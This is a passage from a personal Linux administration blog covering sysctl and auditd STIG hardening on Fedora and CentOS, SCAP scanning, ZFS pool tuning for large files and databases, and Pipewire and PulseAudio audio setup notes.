0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">net.ipv4.conf.all.secure_redirects = 0</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">net.ipv4.conf.all.send_redirects = 0</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">net.ipv4.conf.default.accept_redirects = 0</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">net.ipv4.conf.default.log_martians = 1</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">net.ipv4.conf.default.rp_filter = 1</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">net.ipv4.conf.default.secure_redirects = 0</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">net.ipv4.conf.default.send_redirects = 0</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">net.ipv6.conf.all.accept_redirects = 0</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">net.ipv6.conf.default.accept_redirects = 0</span></p><p><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">After rebooting one last time my system was in compliance with the Common User Security Profile (CUSP) for Fedora Workstation. The system is now in compliance with CUSP.</span></p><p><br /><br /></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span style="border: none; display: inline-block; height: 468px; overflow: hidden; width: 624px;"><img height="468" src="https://lh7-us.googleusercontent.com/l1-dezhLX0RCMTM0-SAZ7XDuGasTFE9SU51I5S2XMm5RRGe0L8NeBR9KtuYZAUiigGY05T3qurMJ1pMLY8jB8UoQrHbJPp9C4gbfFKoTMfVRpXXveKBaK0PnT_fKTgp7CJWzJblG44I_eKci0HkF1tU" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p>WrightRockethttp://www.blogger.com/profile/04897154139709428821noreply@blogger.com0tag:blogger.com,1999:blog-9173305322166784343.post-68398773332091228562023-02-21T15:56:00.001-08:002023-10-20T11:58:08.190-07:00Stig Auditing For CentOS 8 Stream <h3 style="text-align: left;">Auditd</h3><p>The auditd.service provides detailed auditing of attempted or successful kernel system calls and changes to files. The auditctl command can be used to interact with this important service for security.</p><p><span style="font-family: courier; font-size: x-small;">usage: auditctl [options]</span></p><p><span style="font-family: courier; font-size: x-small;"> -a <l,a> Append rule to end of <l>ist with <a>ction</span></p><p><span style="font-family: courier; font-size: x-small;"> -A <l,a> Add rule at beginning of <l>ist with <a>ction</span></p><p><span style="font-family: courier; font-size: x-small;"> -b <backlog> Set max number of outstanding audit buffers</span></p><p><span style="font-family: courier; font-size: x-small;"> allowed Default=64</span></p><p><span style="font-family: courier; font-size: x-small;"> -c Continue through errors in rules</span></p><p><span style="font-family: courier; font-size: x-small;"> -C f=f Compare collected fields if available:</span></p><p><span style="font-family: courier; font-size: x-small;"> Field name, operator(=,!=), field name</span></p><p><span style="font-family: courier; font-size: x-small;"> -d <l,a> Delete rule from <l>ist with <a>ction</span></p><p><span style="font-family: courier; font-size: x-small;"> l=task,exit,user,exclude,filesystem</span></p><p><span style="font-family: courier; font-size: x-small;"> a=never,always</span></p><p><span style="font-family: courier; font-size: x-small;"> -D Delete all rules and watches</span></p><p><span style="font-family: courier; font-size: x-small;"> -e [0..2] Set enabled flag</span></p><p><span style="font-family: courier; font-size: x-small;"> -f [0..2] Set failure flag</span></p><p><span style="font-family: courier; font-size: x-small;"> 0=silent 1=printk 2=panic</span></p><p><span style="font-family: courier; font-size: x-small;"> -F f=v Build rule: field name, operator(=,!=,<,>,<=,</span></p><p><span style="font-family: courier; font-size: x-small;"> >=,&,&=) value</span></p><p><span style="font-family: courier; font-size: x-small;"> -h Help</span></p><p><span style="font-family: courier; font-size: x-small;"> -i Ignore errors when reading rules from file</span></p><p><span style="font-family: courier; font-size: x-small;"> -k <key> Set filter key on audit rule</span></p><p><span style="font-family: courier; font-size: x-small;"> -l List rules</span></p><p><span style="font-family: courier; font-size: x-small;"> -m text Send a user-space message</span></p><p><span style="font-family: courier; font-size: x-small;"> -p [r|w|x|a] Set permissions filter on watch</span></p><p><span style="font-family: courier; font-size: x-small;"> r=read, w=write, x=execute, a=attribute</span></p><p><span style="font-family: courier; font-size: x-small;"> -q <mount,subtree> make subtree part of mount point's dir watches</span></p><p><span style="font-family: courier; font-size: x-small;"> -r <rate> Set limit in messages/sec (0=none)</span></p><p><span style="font-family: courier; font-size: x-small;"> -R <file> read rules from file</span></p><p><span style="font-family: courier; font-size: x-small;"> -s Report status</span></p><p><span style="font-family: courier; font-size: x-small;"> -S syscall Build rule: syscall name or number</span></p><p><span style="font-family: courier; font-size: x-small;"> --signal <signal> Send the specified signal to the daemon</span></p><p><span style="font-family: courier; font-size: x-small;"> -t Trim directory watches</span></p><p><span style="font-family: courier; font-size: x-small;"> -v Version</span></p><p><span style="font-family: courier; font-size: x-small;"> -w <path> Insert watch at <path></span></p><p><span style="font-family: courier; font-size: x-small;"> -W <path> Remove watch at <path></span></p><p><span style="font-family: courier; font-size: x-small;"> --loginuid-immutable Make loginuids unchangeable once set</span></p><p><span style="font-family: courier; font-size: x-small;"> --backlog_wait_time Set the kernel backlog_wait_time</span></p><p><span style="font-family: courier; font-size: x-small;"> --reset-lost Reset the lost record counter</span></p><p><span style="font-family: courier; font-size: x-small;"> --reset_backlog_wait_time_actual Reset the actual backlog wait time counter</span></p><h3 style="text-align: left;">Stig Rules for CentOS 8 Stream</h3><div><br /></div><div><a href="https://github.com/linux-audit/audit-userspace/blob/master/rules/30-stig.rules">https://github.com/linux-audit/audit-userspace/blob/master/rules/30-stig.rules</a></div><div><br /></div><div><div><span style="font-family: courier;"># cd /etc/audit/rules.d/</span></div></div><div><span style="font-family: courier;"># wget <a href="https://github.com/linux-audit/audit-userspace/blob/master/rules/30-stig.rules">https://github.com/linux-audit/audit-userspace/blob/master/rules/30-stig.rules</a></span></div><div><span style="font-family: courier;"># reboot</span></div><div><span style="font-family: courier;"># auditctl -l</span></div><div><div><br /></div><div>-a always,exit -F arch=b32 -S stime,settimeofday,adjtimex -F key=time-change</div><div>-a always,exit -F arch=b64 -S adjtimex,settimeofday -F key=time-change</div><div>-a always,exit -F arch=b32 -S clock_settime -F a0=0x0 -F key=time-change</div><div>-a always,exit -F arch=b64 -S clock_settime -F a0=0x0 -F key=time-change</div><div>-w /etc/localtime -p wa -k time-change</div><div>-w /etc/group -p wa -k identity</div><div>-w /etc/passwd -p wa -k identity</div><div>-w /etc/gshadow -p wa -k identity</div><div>-w /etc/shadow -p wa -k identity</div><div>-w /etc/security/opasswd -p wa -k identity</div><div>-a always,exit -F arch=b32 -S sethostname,setdomainname -F key=system-locale</div><div>-a always,exit -F arch=b64 -S sethostname,setdomainname -F key=system-locale</div><div>-w /etc/issue -p wa -k system-locale</div><div>-w /etc/issue.net -p wa -k system-locale</div><div>-w /etc/hosts -p wa -k system-locale</div><div>-w /etc/hostname -p wa -k system-locale</div><div>-w /etc/NetworkManager/ -p wa -k system-locale</div><div>-w /etc/selinux/ -p wa -k MAC-policy</div><div>-a always,exit -F arch=b32 -S chmod,fchmod,fchmodat -F auid>=1000 -F auid!=-1 -F key=perm_mod</div><div>-a always,exit -F arch=b64 -S chmod,fchmod,fchmodat -F auid>=1000 -F auid!=-1 -F key=perm_mod</div><div>-a always,exit -F arch=b32 -S lchown,fchown,chown,fchownat -F auid>=1000 -F auid!=-1 -F key=perm_mod</div><div>-a always,exit -F arch=b64 -S chown,fchown,lchown,fchownat -F auid>=1000 -F auid!=-1 -F key=perm_mod</div><div>-a always,exit -F arch=b32 -S setxattr,lsetxattr,fsetxattr,removexattr,lremovexattr,fremovexattr -F auid>=1000 -F auid!=-1 -F key=perm_mod</div><div>-a always,exit -F arch=b64 -S setxattr,lsetxattr,fsetxattr,removexattr,lremovexattr,fremovexattr -F auid>=1000 -F auid!=-1 -F key=perm_mod</div><div>-a always,exit -F arch=b32 -S open,creat,truncate,ftruncate,openat,open_by_handle_at,openat2 -F exit=-EACCES -F auid>=1000 -F auid!=-1 -F key=access</div><div>-a always,exit -F arch=b32 -S open,creat,truncate,ftruncate,openat,open_by_handle_at,openat2 -F exit=-EPERM -F auid>=1000 -F auid!=-1 -F key=access</div><div>-a always,exit -F arch=b64 -S open,truncate,ftruncate,creat,openat,open_by_handle_at,openat2 -F exit=-EACCES -F auid>=1000 -F auid!=-1 -F key=access</div><div>-a always,exit -F arch=b64 -S open,truncate,ftruncate,creat,openat,open_by_handle_at,openat2 -F exit=-EPERM -F auid>=1000 -F auid!=-1 -F key=access</div><div>-a always,exit -F arch=b32 -S mount -F auid>=1000 -F auid!=-1 -F key=export</div><div>-a always,exit -F arch=b64 -S mount -F auid>=1000 -F auid!=-1 -F key=export</div><div>-a always,exit -F arch=b32 -S unlink,rename,unlinkat,renameat -F auid>=1000 -F auid!=-1 -F key=delete</div><div>-a always,exit -F arch=b64 -S rename,unlink,unlinkat,renameat -F auid>=1000 -F auid!=-1 -F key=delete</div><div>-w /etc/sudoers -p wa -k actions</div><div>-w /etc/sudoers.d -p wa -k actions</div></div><div><br /></div><h2 style="text-align: left;">scap-workbench</h2><div><div><br /></div><div>23:24:51 </div><div>info </div><div>SCAP Workbench 1.2.0, compiled with Qt 5.12.5, using OpenSCAP 1.3.6</div><div><br /></div><div><br /></div><div>23:25:06 </div><div>info </div><div>Opened file '/usr/share/xml/scap/ssg/content/ssg-centos8-ds.xml'.</div><div><br /></div><div><br /></div><div>23:25:11 </div><div>info </div><div>Querying capabilities...</div><div><br /></div><div><br /></div><div>23:25:11 </div><div>info </div><div>Creating temporary files...</div><div><br /></div><div><br /></div><div>23:25:11 </div><div>info </div><div>Starting the oscap process...</div><div><br /></div><div><br /></div><div>23:25:11 </div><div>info </div><div>Processing...</div><div><br /></div><div><br /></div><div>23:33:16 </div><div>warning </div><div>Remote resources might be necessary for this profile to work properly. Please select "Fetch remote resources" for complete scan</div><div><br /></div><div><br /></div><div>23:33:16 </div><div>warning </div><div>Skipping 'https://access.redhat.com/security/data/oval/com.redhat.rhsa-RHEL8.xml.bz2' file which is referenced from datastream</div><div><br /></div><div><br /></div><div>23:33:16 </div><div>warning </div><div>Skipping ./security-data-oval-com.redhat.rhsa-RHEL8.xml.bz2 file which is referenced from XCCDF content</div><div><br /></div><div><br /></div><div>23:33:16 </div><div>info </div><div>The oscap tool has finished. Reading results...</div><div><br /></div><div><br /></div><div>23:33:16 </div><div>info </div><div>Processing has been finished!</div></div><div><br /></div><div><br /></div><div><table class="highlight tab-size js-file-line-container js-code-nav-container js-tagsearch-file" data-paste-markdown-skip="" data-tab-size="8" data-tagsearch-lang="" data-tagsearch-path="rules/README-rules" style="background-color: white; border-collapse: collapse; border-spacing: 0px; color: #24292f; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; font-size: 14px; tab-size: 8;"><tbody style="box-sizing: border-box;"><tr style="background-color: transparent; box-sizing: border-box;"><td class="blob-num js-line-number js-code-nav-line-number js-blob-rnum" data-line-number="20" id="L20" style="box-sizing: border-box; color: var(--color-fg-subtle); cursor: pointer; font-family: ui-monospace, SFMono-Regular, "SF Mono", Menlo, Consolas, "Liberation Mono", monospace; font-size: 12px; line-height: 20px; min-width: 50px; padding: 0px 10px; position: relative; text-align: right; user-select: none; vertical-align: top; white-space: nowrap; width: 50px;"></td><td class="blob-code blob-code-inner js-file-line" id="LC20" style="box-sizing: border-box; color: var(--color-fg-default); font-family: ui-monospace, SFMono-Regular, "SF Mono", Menlo, Consolas, "Liberation Mono", monospace; font-size: 12px; line-height: 20px; overflow-wrap: normal; overflow: visible; padding: 0px 10px; position: relative; vertical-align: top; white-space: pre;"><br /></td></tr></tbody></table>The rules are not meant to be used all at once. They are pieces of a policy that should be thought out and individual files copied to /etc/audit/rules.d/ directory. For example, if you wanted to set a system up in the STIG configuration, copyrules 10-base-config, 30-stig, 31-privileged, and 99-finalize to /etc/audit/rules.d/ directory.</div>WrightRockethttp://www.blogger.com/profile/04897154139709428821noreply@blogger.com0tag:blogger.com,1999:blog-9173305322166784343.post-8478214774982174252022-12-03T15:53:00.005-08:002023-02-06T18:26:02.240-08:00ZFS Pool Optimization on Linux<h3 style="text-align: left;">ZFS Pool Optimizations</h3><div>I have previously blogged about getting started with ZFS on Linux.</div><p><span style="background-color: white; color: rgba(0, 0, 0, 0.52); font-family: Roboto, RobotoDraft, Helvetica, Arial, sans-serif; font-size: 14px;">https://wrightrocket.blogspot.com/2018/11/zfs-on-linux-quick-start.html</span></p><p><br /></p><p>Instead of creating your own partitions it is better to use the whole disk with the <b>zfs create </b>command. If you want to optimize for 4K sector disks, then use <b>ashift=12.</b></p><p>Using Whole Disk /dev/sdd before creating a </p><p>[keith@lynx X-Plane 12]$ <b>sudo fdisk -l /dev/sdd</b></p><p>Disk /dev/sdd: 3.64 TiB, 4000787030016 bytes, 7814037168 sectors</p><p>Disk model: ST4000DM004-2CV1</p><p>Units: sectors of 1 * 512 = 512 bytes</p><p>Sector size (logical/physical): 512 bytes / 4096 bytes</p><p>I/O size (minimum/optimal): <span style="background-color: #fcff01;">4096 bytes / 4096 bytes</span></p><div><br /></div><div>After creating a pool with:</div><div><br /></div><div><p>Using ashift=12 for 4K sector because of I/O Size if Physically and Optimally reported.</p><p>[keith@lynx X-Plane 12]$ <b>sudo zpool create -o ashift=12 ST4000 /dev/sdd</b></p></div><p>[keith@lynx ST4000]$ <b>sudo fdisk -l /dev/sdd</b></p><p>Disk /dev/sdd: 3.64 TiB, 4000787030016 bytes, 7814037168 sectors</p><p>Disk model: ST4000DM004-2CV1</p><p>Units: sectors of 1 * 512 = 512 bytes</p><p>Sector size (logical/physical): 512 bytes / 4096 bytes</p><p>I/O size (minimum/optimal): 4096 bytes / 4096 bytes</p><p>Disklabel type: gpt</p><p>Disk identifier: D26196F3-854B-FD4B-B09C-B43BEE295D38</p><p><br /></p><p>Device Start End Sectors Size Type</p><p>/dev/sdd1 2048 7814019071 7814017024 3.6T Solaris /usr & Apple ZFS</p><p>/dev/sdd9 7814019072 7814035455 16384 8M Solaris reserved 1</p><div><br /></div><h3 style="text-align: left;">Swimming in the Pools</h3><p>[keith@lynx X-Plane 12]$ <b>zfs list</b></p><p>NAME USED AVAIL REFER MOUNTPOINT</p><p>ST2000 1.37T 619G 96K /data</p><p>ST2000/data 909G 619G 881G /home</p><p>ST2000/gallery 458G 619G 458G /data/gallery</p><p>ST2000/keith 33.8G 619G 33.8G /data/keith</p><p>ST4000 384K 3.51T 96K /ST4000</p><div><br /></div><div><div>[keith@lynx X-Plane 12]$ <b>cd /ST4000/</b></div><div>[keith@lynx ST4000]$ <b>df -hT .</b></div><div>Filesystem Type Size Used Avail Use% Mounted on</div><div>ST4000 zfs 3.6T 128K 3.6T 1% /ST4000</div></div><div><br /></div><h3 style="text-align: left;">Getting and Setting Pool Attributes</h3><div><br /></div><div><div>[keith@lynx ST4000]$ <b>zfs get all ST4000 | sort</b></div><div>NAME PROPERTY VALUE SOURCE</div><div>ST4000 aclinherit restricted default</div><div>ST4000 aclmode discard default</div><div>ST4000 acltype off default</div><div>ST4000 atime on default</div><div>ST4000 available 3.51T -</div><div>ST4000 canmount on default</div><div>ST4000 casesensitivity sensitive -</div><div>ST4000 checksum on default</div><div>ST4000 <span style="background-color: #a2c4c9;">compression off </span> default</div><div>ST4000 compressratio 1.00x -</div><div>ST4000 context none default</div><div>ST4000 copies 1 default</div><div>ST4000 createtxg 1 -</div><div>ST4000 creation Sat Dec 3 14:52 2022 -</div><div>ST4000 dedup off default</div><div>ST4000 defcontext none default</div><div>ST4000 devices on default</div><div>ST4000 dnodesize legacy default</div><div>ST4000 encryption off default</div><div>ST4000 exec on default</div><div>ST4000 filesystem_count none default</div><div>ST4000 filesystem_limit none default</div><div>ST4000 fscontext none default</div><div>ST4000 guid 30196109335578476 -</div><div>ST4000 keyformat none default</div><div>ST4000 keylocation none default</div><div>ST4000 logbias latency default</div><div>ST4000 logicalreferenced 42K -</div><div>ST4000 logicalused 143K -</div><div>ST4000 mlslabel none default</div><div>ST4000 mounted yes -</div><div>ST4000 mountpoint /ST4000 default</div><div>ST4000 nbmand off default</div><div>ST4000 normalization none -</div><div>ST4000 objsetid 54 -</div><div>ST4000 overlay on default</div><div>ST4000 pbkdf2iters 0 default</div><div>ST4000 primarycache all default</div><div>ST4000 quota none default</div><div>ST4000 readonly off default</div><div>ST4000 <span style="background-color: #b6d7a8;">recordsize</span> <span style="background-color: #b6d7a8;">128K</span> default</div><div>ST4000 redundant_metadata all default</div><div>ST4000 refcompressratio 1.00x -</div><div>ST4000 referenced 96K -</div><div>ST4000 refquota none default</div><div>ST4000 refreservation none default</div><div>ST4000 relatime off default</div><div>ST4000 reservation none default</div><div>ST4000 rootcontext none default</div><div>ST4000 secondarycache all default</div><div>ST4000 setuid on default</div><div>ST4000 sharenfs off default</div><div>ST4000 sharesmb off default</div><div>ST4000 snapdev hidden default</div><div>ST4000 snapdir hidden default</div><div>ST4000 snapshot_count none default</div><div>ST4000 snapshot_limit none default</div><div>ST4000 special_small_blocks 0 default</div><div>ST4000 sync standard default</div><div>ST4000 type filesystem -</div><div>ST4000 used 420K -</div><div>ST4000 usedbychildren 324K -</div><div>ST4000 usedbydataset 96K -</div><div>ST4000 usedbyrefreservation 0B -</div><div>ST4000 usedbysnapshots 0B -</div><div>ST4000 utf8only off -</div><div>ST4000 version 5 -</div><div>ST4000 volmode default default</div><div>ST4000 vscan off default</div><div>ST4000 written 96K -</div><div>ST4000 xattr on default</div><div>ST4000 zoned off default</div></div><div><br /></div><h3 style="text-align: left;">Large File Application Optimization</h3><div>Optimize the pool with a large recordsize attribute for large file applications.</div><div><br /></div><div><div>[keith@lynx ST4000]$ sudo zfs set <span style="background-color: #b6d7a8;">recordsize=1M</span> ST4000</div><div>[keith@lynx ST4000]$ sudo zfs get <span style="background-color: #b6d7a8;">recordsize</span> ST4000</div><div>NAME PROPERTY VALUE SOURCE</div><div>ST4000 <span style="background-color: #b6d7a8;">recordsize 1M</span> local</div></div><div><br /></div><h3 style="text-align: left;">Optimize with compression lz4</h3><div><br /></div><div><div>[keith@lynx ST4000]$ <b>sudo zfs set <span style="background-color: #a2c4c9;">compression=lz4</span> ST4000</b></div><div>[keith@lynx ST4000]$<b> sudo zfs get <span style="background-color: #a2c4c9;">compression</span> ST4000</b></div><div>NAME PROPERTY VALUE SOURCE</div><div>ST4000 <span style="background-color: #a2c4c9;"> compression lz4</span> local</div></div><div><br /></div><h3 style="text-align: left;">Database Application Optimizations</h3><div><br /></div><div><div><b>sudo zfs create -o redundant_metadata=most -o logbias=throughput ST4000/database</b></div></div><div><br /></div><div><div>[keith@lynx ST4000]$ <b>sudo zfs get primarycache ST4000/database</b></div><div>NAME PROPERTY VALUE SOURCE</div><div>ST4000/database primarycache all default</div><div>[keith@lynx ST4000]$ <b>sudo zfs set primarycache=metadata ST4000/database</b></div><div>[keith@lynx ST4000]$ <b>sudo zfs get secondarycache ST4000/database</b></div><div>NAME PROPERTY VALUE SOURCE</div><div>ST4000/database secondarycache all default</div><div>[keith@lynx ST4000]$ <b>sudo zfs set secondarycache=metadata ST4000/database</b></div><div>[keith@lynx ST4000]$ <b>sudo zfs get secondarycache ST4000/database</b></div><div>NAME PROPERTY VALUE SOURCE</div><div>ST4000/database secondarycache metadata local</div></div><div><br /></div><div>Customize the recordsize according to the database as discussed in the OpenZFS documentation.</div><div><br /></div><div><b>Postgres Database Optimizations</b></div><div><br /></div><div>Postgres uses an 8K sized page so setting the filesystem to support that optimizes operations.</div><div><br /></div><div><div>[keith@lynx ST4000]$ <b>sudo zfs create -o recordsize=8K ST4000/database/postgres</b></div><div>[keith@lynx ST4000]$ <b>sudo zfs get recordsize ST4000/database/postgres</b></div><div>NAME PROPERTY VALUE SOURCE</div><div>ST4000/database/postgres recordsize 8K local</div><div><br /></div><h3 style="text-align: left;">SQLite Database Optimizations</h3><div>SQLite uses 64K sized pages, so set the recordsize appropriately:</div><div><br /></div><div>[keith@lynx ST4000]$ <b>sudo zfs create -o recordsize=64K ST4000/database/sqlite</b></div><div>[keith@lynx ST4000]$ # set the SQLite page size to 65536</div><div>[keith@lynx ST4000]$ <b>sudo zfs get recordsize ST4000/database/sqlite</b></div><div>NAME PROPERTY VALUE SOURCE</div><div>ST4000/database/sqlite recordsize 64K local</div></div><div><br /></div><div>When a database is created under these paths, they are optimized for their operation at that mount point.</div><div><br /></div><div>To change where the path will be located for these operations, a mount point must be provided. </div><div><br /></div><div><div><b>sudo zfs /var/sqlite ST4000/database/sqlite</b></div></div><div><br /></div><div><h2>Device Performance Tuning</h2><div>Open ZFS has a great section on Workload tuning:</div><div><br /></div><div><a href="https://openzfs.github.io/openzfs-docs/Performance%20and%20Tuning/Workload%20Tuning.html#basic-concepts">https://openzfs.github.io/openzfs-docs/Performance%20and%20Tuning/Workload%20Tuning.html#basic-concepts</a></div><div><br /></div><div>Using NVMe or SSD or very fast devices so you can cache/buffer I/O. How I did it was recorded in the above in the output of <span style="background-color: #cccccc; color: #2b00fe;">zpool history</span>.</div><div><div><br /></div><div>A snippet from a recent <span style="background-color: #cccccc; color: #2b00fe;">zpool history </span>shows adding a log and cache device to my "data" pool:</div><div><br /></div><div>2022-10-06.19:43:08 <span style="background-color: #cccccc; color: #2b00fe;">zpool add data log /dev/disk/by-id/nvme-Samsung_SSD_970_EVO_500GB_S5H7NR0R103938M-part1</span></div><div>2022-10-06.22:13:57 <span style="background-color: #cccccc;"><span style="color: #2b00fe;">zpool add data cache /dev/disk/by-id/nvme-Samsung_SSD_970_EVO_500GB_S5H7NR0R103938M-part2</span></span></div><div><br /></div></div><div>To create a read caching device use: <span style="color: #2b00fe;"><span class="pre" face="SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", Courier, monospace" style="box-sizing: border-box;">zpool</span><span face="SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", Courier, monospace" style="background-color: white;"> </span><span class="pre" face="SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", Courier, monospace" style="box-sizing: border-box;">add</span><span face="SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", Courier, monospace" style="background-color: white;"> </span><span class="pre" face="SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", Courier, monospace" style="box-sizing: border-box;">POOLNAME</span><span face="SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", Courier, monospace" style="background-color: white;"> </span><span class="pre" face="SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", Courier, monospace" style="box-sizing: border-box;">cache</span><span face="SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", Courier, monospace" style="background-color: white;"> </span><span class="pre" face="SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", Courier, monospace" style="box-sizing: border-box;">DEVICENAME</span></span></div><div>To create a write buffering transaction log device use: <span style="color: #2b00fe;"><span class="pre" face="SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", Courier, monospace" style="box-sizing: border-box;">zpool</span><span face="SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", Courier, monospace" style="background-color: white;"> </span><span class="pre" face="SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", Courier, monospace" style="box-sizing: border-box;">add</span><span face="SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", Courier, monospace" style="background-color: white;"> </span><span class="pre" face="SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", Courier, monospace" style="box-sizing: border-box;">POOLNAME</span><span face="SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", Courier, monospace" style="background-color: white;"> </span><span class="pre" face="SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", Courier, monospace" style="box-sizing: border-box;">log</span><span face="SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", Courier, monospace" style="background-color: white;"> </span><span class="pre" face="SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", Courier, monospace" style="box-sizing: border-box;">DEVICENAME</span></span></div><h3>Primary Cache</h3><div>If you have added a LOG device then an <span style="background-color: #fff2cc;">all</span> value is appropriate for most workloads, but <span style="background-color: #fff2cc;">metadata</span> is preferred for systems that do their own caching such as databases. </div><div><br /></div><div><span style="background-color: #cccccc; color: #2b00fe;">zfs get primarycache ST2000/data</span></div><div><span style="background-color: #cccccc; color: #2b00fe;"><br /></span></div><div><div>NAME PROPERTY VALUE SOURCE</div><div>ST2000/data primarycache <span style="background-color: #fff2cc;">all</span> default</div></div><h3>Secondary Cache</h3><div><div><span style="background-color: #cccccc; color: #2b00fe;">zfs get secondarycache ST2000/data</span></div><div>NAME PROPERTY VALUE SOURCE</div><div>ST2000/data secondarycache all default</div></div><div><br /></div><div>The cache device sets the limit for effectiveness up to half of the RAM available. On a 32GB system, a 16GB cache is optimal. Having a log device larger than the cache device provides no additional benefit. So, a 16GB cache device that is optimal dictates that no more than a 16GB log device is optimal.</div><div><br /></div></div>WrightRockethttp://www.blogger.com/profile/04897154139709428821noreply@blogger.com0tag:blogger.com,1999:blog-9173305322166784343.post-84556010464652222822022-10-04T21:31:00.005-07:002022-10-06T13:04:08.334-07:00Pipewire Linux Notes<p> This page will gather resources for Pipewire used in Linux for managing audio and video.</p><p>One of the best sites I've found is:</p><p><a href="https://bootlin.com/blog/an-introduction-to-pipewire/">https://bootlin.com/blog/an-introduction-to-pipewire/</a></p><p><br /></p><p>After installing pipewire and wireplumber related packages, one of the most important commands I found out about for starting wireplumber, pipewire and pipewire-pulse was:</p><p><br /></p><p>systemctl --user enable --now pipewire.service pipewire-pulse.service wireplumber.service</p><p><br /></p><p><a href="https://ubuntuhandbook.org/index.php/2022/04/pipewire-replace-pulseaudio-ubuntu-2204/">https://ubuntuhandbook.org/index.php/2022/04/pipewire-replace-pulseaudio-ubuntu-2204/</a></p><p>took me to pipewire and wireplumber where my system seemed broken. It was supposed to get me back where it was working, but it didn't.</p><h3 style="text-align: left;">WirePlumber</h3><div><a href="https://pipewire.pages.freedesktop.org/wireplumber/">https://pipewire.pages.freedesktop.org/wireplumber/</a></div><h3 style="text-align: left;"><br />Media Session Manager</h3><div><a href="https://docs.pipewire.org/page_session_manager.html">https://docs.pipewire.org/page_session_manager.html</a></div><h3 style="text-align: left;"><br /></h3>WrightRockethttp://www.blogger.com/profile/04897154139709428821noreply@blogger.com0tag:blogger.com,1999:blog-9173305322166784343.post-21521926093366785542022-10-04T18:45:00.003-07:002022-10-19T20:10:15.686-07:00PulseAudio Native Protocol and Tunnel Sink Modules<p>The PulseAudio Native Protocol module provides a source for the sound. It is considered to be on the Server side of communication because it provides an input source for the Client. The Server is the place where data is generated by playing an audio file for example.</p><p>On the Server, which is to be the system where the audio is to be played, either a specific IP address or all addresses (0.0.0.0) needs to be set in the IP variable. The port can be any free port over 1023 and less than 65,256. The use of TCP port 5555 is an arbitrary choice. Whatever the value used to set the PORT variable needs to be the same on both the Client and Server. </p><p>For example the following command would load <b>module-native-protocol-tcp</b> to listen on all addresses using TCP port 5555. Note that the command is run by the logged in user and not using sudo, su or the root account.</p><pre 